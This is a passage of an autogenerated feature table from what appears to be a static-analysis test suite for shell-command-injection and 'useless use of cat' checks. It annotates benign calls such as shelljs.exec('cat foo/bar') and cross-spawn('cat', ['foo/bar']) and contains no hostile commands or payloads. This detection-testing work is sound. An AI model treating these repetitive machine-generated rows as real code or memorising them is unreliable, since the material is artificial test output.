autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:37 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:37 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:37 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:30:147:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:40:147:45 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:7 | shelljs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:7 | shelljs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:7 | shelljs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:12 | shelljs.exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:12 | shelljs.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:12 | shelljs.exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | exceptional return of shelljs ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | exceptional return of shelljs ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | exceptional return of shelljs ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | shelljs ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | shelljs ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:1:148:81 | shelljs ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:9:148:12 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:9:148:12 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:9:148:12 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:14:148:26 | "cat foo/bar" | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:29:148:46 | {encoding: 'utf8'} | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:37 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:37 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:37 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:30:148:45 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:40:148:45 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | 'arguments' object of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | (err, o ... g(out)} | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | exceptional return of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | return of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:49:148:80 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:50:148:52 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:50:148:52 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:50:148:52 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:50:148:52 | err | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:50:148:52 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:55:148:57 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:70 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:70 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:70 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:70 | console | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:70 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:74 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:74 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:74 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:74 | console.log | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:74 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | exceptional return of console.log(out) | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:64:148:79 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:72:148:74 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:72:148:74 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:72:148:74 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:72:148:74 | log | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:72:148:74 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:148:76:148:78 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:10 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:10 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:10 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn ... spawn') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn ... spawn') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:5:150:35 | cspawn ... spawn') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:20 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:20 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | exceptional return of require ... spawn') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | exceptional return of require ... spawn') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | exceptional return of require ... spawn') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | require ... spawn') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | require ... spawn') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:14:150:35 | require ... spawn') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:150:22:150:34 | 'cross-spawn' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:6 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:6 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:6 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | exceptional return of cspawn( ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | exceptional return of cspawn( ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:1:151:48 | exceptional return of cspawn( ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:8:151:12 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:15:151:25 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:16:151:24 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:151:28:151:47 | { encoding: 